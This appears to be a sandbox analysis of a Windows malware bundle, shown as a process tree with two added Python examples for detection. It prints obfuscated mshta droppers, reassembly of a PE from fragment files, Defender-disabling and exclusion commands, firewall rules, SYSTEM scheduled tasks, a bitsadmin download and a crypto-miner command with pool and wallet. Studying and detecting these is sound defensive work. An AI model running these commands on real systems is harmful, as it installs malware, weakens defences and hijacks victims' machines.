[depth 7] C:\Windows\System32\netsh.exe | "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
-
[depth 7] C:\Windows\System\svchost.exe | "C:\Windows\System\svchost.exe" formal
-
[depth 7] C:\Windows\SYSTEM32\schtasks.exe | schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
- Creates scheduled task(s)
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe | "C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon11a9d578c6.exe
-
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11a9d578c6.exe | Mon11a9d578c6.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon11c267c861c0984e.exe
-
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe | Mon11c267c861c0984e.exe
- Executes dropped EXE
-
[depth 6] C:\Windows\SysWOW64\mshta.exe | "C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT("wscRiPT.shELl" ).Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF """" == """" for %i in (""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" ) do taskkill /IM ""%~nXi"" /f" , 0 ,tRUE ) )
-
[depth 7] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /R typE "C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 &iF "" == "" for %i in ("C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe") do taskkill /IM "%~nXi" /f
-
[depth 8] C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE | ..\f44LQm.eXE /PsV~zGbxsNCn0ht2
- Executes dropped EXE
-
[depth 9] C:\Windows\SysWOW64\mshta.exe | "C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT("wscRiPT.shELl" ).Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 & iF ""/PsV~zGbxsNCn0ht2 "" == """" for %i in (""C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE"" ) do taskkill /IM ""%~nXi"" /f" , 0 ,tRUE ) )
-
[depth 10] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /R typE "C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 &iF "/PsV~zGbxsNCn0ht2 " == "" for %i in ("C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE") do taskkill /IM "%~nXi" /f
-
[depth 9] C:\Windows\SysWOW64\mshta.exe | "C:\Windows\System32\mshta.exe" VBScriPT: CLOSe (CrEateoBJEcT("wscRIPt.shElL"). ruN( "CMd /c eCHO i2l%dAte%xMAM> 5104y14.R4 & ecHO | SEt /P = ""MZ"" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP + 5104y14.R4 ..\3U_2.OI& deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI " , 0 , TRuE ) )
-
[depth 10] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c eCHO i2l%dAte%xMAM> 5104y14.R4 &ecHO | SEt /P = "MZ" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP +5104y14.R4 ..\3U_2.OI& deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI
-
[depth 11] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>QDV9E5X.S"
-
[depth 11] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" ecHO "
-
[depth 11] C:\Windows\SysWOW64\msiexec.exe | msiexec.exe /Y ..\3U_2.OI
- Loads dropped DLL
-
[depth 8] C:\Windows\SysWOW64\taskkill.exe | taskkill /IM "Mon11c267c861c0984e.exe" /f
- Kills process with taskkill
-
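The mshta > cmd > msiexec chain above never drops a complete DLL: the "MZ" prefix is produced at run time by `echo | set /p`, the body sits in fragment files (I2U1lN.HIP, YZBKn5nE.w5T, p5tS4.L, GO8yZV.FP), `copy /B` glues them together, an `echo`'d date string is appended, and `msiexec /Y` loads the result through DllRegisterServer. The following is an added example, not code from the sample or from the sandbox, that reproduces those mechanics on a synthetic PE header so the effect on file-based checks can be measured offline. The fragment names mirror the report; the bytes, the fragment boundaries and the date stamp (standing in for whatever `%dAte%` expanded to on the victim) are made up.

```python
"""Why the copy /B chain above defeats per-file signature checks.

Added example, not code from the sample or the sandbox: a synthetic DOS/PE header
stands in for the real DLL, the fragment names mirror the report, the bytes and
the date stamp are made up."""
import hashlib
import struct
from typing import Dict

FRAGMENT_NAMES = ["I2U1lN.HIP", "YZBKn5nE.w5T", "p5tS4.L", "GO8yZV.FP"]  # names from the report


def synthetic_pe() -> bytes:
    """Smallest byte string that passes looks_like_pe(): a DOS header whose e_lfanew
    (offset 0x3C) points at a 'PE\\0\\0' signature, followed by a stub FileHeader."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)            # 0x40-byte IMAGE_DOS_HEADER
    struct.pack_into("<I", dos, 0x3C, 0x80)            # e_lfanew -> 0x80
    stub = b"\x00" * (0x80 - len(dos))                 # DOS stub padding
    file_header = struct.pack("<H", 0x14C) + b"\x00" * 18   # Machine=i386, rest zero
    return bytes(dos) + stub + b"PE\x00\x00" + file_header + b"\x00" * 0x40


def looks_like_pe(data: bytes) -> bool:
    """The gate a per-file scanner applies before running PE-specific signatures."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def split_like_dropper(pe: bytes) -> Dict[str, bytes]:
    """Mimic the dropper's on-disk layout: the leading 'MZ' is never written (set /p
    produces it at run time) and the remainder is sliced into the fragment files."""
    body = pe[2:]
    size = -(-len(body) // len(FRAGMENT_NAMES))        # ceil division
    return {name: body[i * size:(i + 1) * size] for i, name in enumerate(FRAGMENT_NAMES)}


def reassemble(fragments: Dict[str, bytes], date_stamp: str) -> bytes:
    """copy /B /Y QDV9E5X.S + <fragments> + 5104y14.R4 ..\\3U_2.OI, done in Python:
    QDV9E5X.S holds 'MZ' (echo | set /p, no newline); 5104y14.R4 holds the echo'd
    date trailer, CRLF included, which lands after the PE data."""
    header = b"MZ"
    trailer = f"i2l{date_stamp}xMAM\r\n".encode()      # echo i2l%dAte%xMAM> 5104y14.R4
    return header + b"".join(fragments[n] for n in FRAGMENT_NAMES) + trailer


def demo(date_stamp: str = "18.10.2021") -> dict:
    """Run the chain once; date_stamp stands in for whatever %dAte% expanded to."""
    pe = synthetic_pe()
    frags = split_like_dropper(pe)
    rebuilt = reassemble(frags, date_stamp)
    return {
        "fragments_look_like_pe": [looks_like_pe(f) for f in frags.values()],
        "rebuilt_looks_like_pe": looks_like_pe(rebuilt),
        "payload_intact": rebuilt.startswith(pe),
        "rebuilt_sha256": hashlib.sha256(rebuilt).hexdigest(),
    }


if __name__ == "__main__":
    for stamp in ("18.10.2021", "19.10.2021"):
        print(stamp, demo(stamp))
```

None of the four fragments passes the MZ/PE gate, the rebuilt file does, and because the trailer carries the local date the SHA-256 of the rebuilt DLL differs from run to run even though the PE bytes are identical. File hashes of the fragments or of `..\3U_2.OI` are therefore weak indicators for this family; the stable signal is the command line itself (`set /p` writing "MZ", `copy /B`, `msiexec /Y` on a non-.msi name).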
[depth 4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon11cd46e0d889458.exe
-
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11cd46e0d889458.exe | Mon11cd46e0d889458.exe
- Executes dropped EXE
-
[depth 6] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe | "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\inst1.exe | "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe | "C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
- Executes dropped EXE
-
[depth 8] C:\ProgramData\8070241.exe | "C:\ProgramData\8070241.exe"
-
[depth 8] C:\ProgramData\1355166.exe | "C:\ProgramData\1355166.exe"
-
[depth 9] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe | "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
- Suspicious behavior: SetClipboardViewer
-
[depth 8] C:\ProgramData\6169518.exe | "C:\ProgramData\6169518.exe"
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 8] C:\ProgramData\1715481.exe | "C:\ProgramData\1715481.exe"
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe | "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
-
[depth 8] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 276
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\Pro.exe | "C:\Users\Admin\AppData\Local\Temp\Pro.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 8] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 296
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\setup.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe"
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 8] C:\Users\Admin\AppData\Local\Temp\is-HCI1T.tmp\setup.tmp | "C:\Users\Admin\AppData\Local\Temp\is-HCI1T.tmp\setup.tmp" /SL5="$20264,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
[depth 9] C:\Users\Admin\AppData\Local\Temp\setup.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
- Suspicious use of SetWindowsHookEx
-
[depth 10] C:\Users\Admin\AppData\Local\Temp\is-GO73C.tmp\setup.tmp | "C:\Users\Admin\AppData\Local\Temp\is-GO73C.tmp\setup.tmp" /SL5="$10422,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
[depth 11] C:\Users\Admin\AppData\Local\Temp\is-R02EC.tmp\postback.exe | "C:\Users\Admin\AppData\Local\Temp\is-R02EC.tmp\postback.exe" ss1
- Suspicious use of SetWindowsHookEx
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\4.exe | "C:\Users\Admin\AppData\Local\Temp\4.exe"
-
[depth 8] C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 5232 -s 1696
- Program crash
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\EASS.exe | "C:\Users\Admin\AppData\Local\Temp\EASS.exe"
- Suspicious use of SetThreadContext
-
[depth 8] C:\Users\Admin\AppData\Local\Temp\EASS.exe | "C:\Users\Admin\AppData\Local\Temp\EASS.exe"
- Suspicious use of SetWindowsHookEx
-
[depth 9] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1052
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\setup_2.exe | "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
- Suspicious use of SetWindowsHookEx
-
[depth 8] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 276
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\9.exe | "C:\Users\Admin\AppData\Local\Temp\9.exe"
-
[depth 8] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe | "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe | "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
-
[depth 8] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
-
[depth 9] C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
-
[depth 8] C:\Users\Admin\AppData\Roaming\services64.exe | "C:\Users\Admin\AppData\Roaming\services64.exe"
- Suspicious use of SetThreadContext
-
[depth 9] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
-
[depth 10] C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
- Creates scheduled task(s)
-
[depth 9] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
-
[depth 9] C:\Windows\explorer.exe | C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
-
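Almost everything worth alerting on in this tree is visible in the command line alone: mshta launching inline VBScript, the `set /p` "MZ" plus `copy /B` reassembly, `msiexec /Y` on a non-.msi file, `bitsadmin /Transfer` as a downloader, `schtasks /create` with `/rl HIGHEST` or `/ru SYSTEM`, `Add-MpPreference -ExclusionPath`, `netsh advfirewall` allow rules for a `svchost.exe` living in `C:\Windows\System\` rather than System32, and `explorer.exe` carrying XMRig-style `--algo=rx/0 --url=` arguments after services64.exe hollowed it. The following is an added example, not code from the sample, the sandbox or any of the tools involved: a small rule set over process-creation command lines that flags those patterns and pulls out the indicators a responder would pivot on (URLs, pool, wallet, task names, exclusion paths, firewall program paths). The sample command lines are constructed from the process tree above, lightly shortened; the rule names and IOC field names are this example's own.

```python
"""Command-line triage for the LOLBin and persistence patterns in this process tree.
Added example, not code from the sample or the sandbox. SAMPLE_CMDLINES are
constructed from the report's process tree; rule and field names are arbitrary."""
import re
from typing import Dict, List

# rule name -> regex over the full command line (all case-insensitive)
RULES: Dict[str, re.Pattern] = {
    # mshta running inline VBScript that spawns cmd: script-host proxy execution
    "mshta_inline_vbscript": re.compile(r'\bmshta(\.exe)?"?\s+vbscript:', re.I),
    # set /p writes a bare "MZ" and copy /B glues the fragments into a PE
    "copy_b_pe_reassembly": re.compile(r'set\s+/p\s*=\s*"?mz"?.*copy\s+/b', re.I | re.S),
    # msiexec /Y calls DllRegisterServer on an arbitrary DLL (here a non-.msi name)
    "msiexec_regserver_dll": re.compile(r"\bmsiexec(\.exe)?\s+/y\s+", re.I),
    # BITS used as a downloader
    "bitsadmin_download": re.compile(r'\bbitsadmin(\.exe)?"?\s+/transfer\b', re.I),
    # scheduled task persistence running elevated or as SYSTEM
    "schtasks_privileged_persistence": re.compile(
        r"\bschtasks(\.exe)?\s+/create\b.*(/rl\s+highest|/ru\s+system)", re.I),
    # Defender exclusion added from PowerShell
    "defender_exclusion": re.compile(r"add-mppreference\s+-exclusionpath", re.I),
    # firewall allow rule for a program path
    "netsh_firewall_allow": re.compile(
        r'\bnetsh(\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b.*action=allow', re.I),
    # svchost.exe anywhere under C:\Windows except System32\ and SysWOW64\
    "svchost_masquerade": re.compile(
        r'c:\\windows\\(?!system32\\|syswow64\\)[^"\s]*\\svchost\.exe', re.I),
    # XMRig-style flags carried by explorer.exe: injected or hollowed miner
    "miner_args_in_system_binary": re.compile(r"explorer\.exe.*--algo=rx/0.*--url=", re.I),
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
POOL_RE = re.compile(r"--url=(\S+)")
WALLET_RE = re.compile(r"--user=([0-9A-Za-z]+)")      # stops at the '.' worker suffix
TASK_RE = re.compile(r'/tn\s+"([^"]+)"', re.I)
EXCL_RE = re.compile(r"-ExclusionPath\s+(\S+)", re.I)
FW_PROG_RE = re.compile(r'program="([^"]+)"', re.I)


def extract_iocs(cmdline: str) -> Dict[str, List[str]]:
    """Pull pivotable indicators out of one command line."""
    iocs: Dict[str, List[str]] = {}
    if urls := URL_RE.findall(cmdline):
        iocs["urls"] = urls
    if m := POOL_RE.search(cmdline):
        iocs["miner_pool"] = [m.group(1)]
    if m := WALLET_RE.search(cmdline):
        iocs["miner_wallet"] = [m.group(1)]
    if tasks := TASK_RE.findall(cmdline):
        iocs["task_names"] = tasks
    if m := EXCL_RE.search(cmdline):
        iocs["defender_exclusions"] = [m.group(1)]
    if progs := FW_PROG_RE.findall(cmdline):
        iocs["firewall_programs"] = progs
    return iocs


def classify(cmdline: str) -> List[str]:
    """Names of every rule the command line matches (empty list for benign lines)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def triage(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Keep only the lines that hit at least one rule, with their hits and IOCs."""
    findings: List[Dict[str, object]] = []
    for line in cmdlines:
        if hits := classify(line):
            findings.append({"cmdline": line, "hits": hits, "iocs": extract_iocs(line)})
    return findings


# Constructed from the process tree above (shortened); not captured telemetry.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" VBSCRIpT: cLoSE ( crEAtEOBJeCT("wscRiPT.shELl" ).Run ( "Cmd /R typE ""C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11c267c861c0984e.exe"" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2" , 0 ,tRUE ) )',
    r'"C:\Windows\System32\cmd.exe" /c eCHO i2l%dAte%xMAM> 5104y14.R4 &ecHO | SEt /P = "MZ" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP +5104y14.R4 ..\3U_2.OI& deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI',
    r'msiexec.exe /Y ..\3U_2.OI',
    r'"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z',
    r'schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM',
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath c:\\windows\\",
    r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes',
    r'C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --randomx-mode=auto --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --tls --cinit-stealth',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483',
    r'C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 276',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES):
        print(", ".join(finding["hits"]), "|", finding["iocs"])
```

The Edge ad-URL launches and the WerFault crash handlers in the sample list produce no hits, which is the intended behaviour: they are noisy in this tree but not themselves malicious, and the URLs they carry are better harvested from the report's network section than alerted on. Regexes over a single command line are deliberately simple; in production the same logic belongs in a Sigma rule or EDR query keyed on parent/child pairs (for example `wmiprvse.exe` spawning `rundll32.exe`, flagged at the top of this report), which these flat samples cannot express.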
[depth 4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon11a22bde2b.exe /mixone
-
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11a22bde2b.exe | Mon11a22bde2b.exe /mixone
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[depth 6] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 280
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Mon1124e978ea57bf.exe
-
[depth 5] C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1124e978ea57bf.exe | Mon1124e978ea57bf.exe
- Executes dropped EXE
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe | "C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"
- Executes dropped EXE
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe | "C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\0knn9mY0l5PQHp4gWsjZSlpS.exe | "C:\Users\Admin\Pictures\Adobe Films\0knn9mY0l5PQHp4gWsjZSlpS.exe"
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\q1qArhKu7efjajBNmy5h0n8M.exe | "C:\Users\Admin\Pictures\Adobe Films\q1qArhKu7efjajBNmy5h0n8M.exe"
- Executes dropped EXE
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\HGnD7vZ80Dldb3sA9NYHS6wO.exe | "C:\Users\Admin\Pictures\Adobe Films\HGnD7vZ80Dldb3sA9NYHS6wO.exe"
-
[depth 7] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 232
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\xuxy0m26qkl1ozW_XcqhZr0B.exe | "C:\Users\Admin\Pictures\Adobe Films\xuxy0m26qkl1ozW_XcqhZr0B.exe"
-
[depth 7] C:\Program Files (x86)\Company\NewProduct\cutm3.exe | "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
[depth 7] C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe | "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
-
[depth 7] C:\Program Files (x86)\Company\NewProduct\inst3.exe | "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
- Suspicious use of SetWindowsHookEx
-
[depth 6] C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe | "C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\4mulY6HX0OKjNh4y5va_iEdo.exe"C:\Users\Admin\Pictures\Adobe Films\4mulY6HX0OKjNh4y5va_iEdo.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose8⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 08⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 28⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\sbvc.exe"C:\Users\Admin\AppData\Local\Temp\sbvc.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 2327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xWDw4KvnprXoiUalqAVdu3zs.exe"C:\Users\Admin\Pictures\Adobe Films\xWDw4KvnprXoiUalqAVdu3zs.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
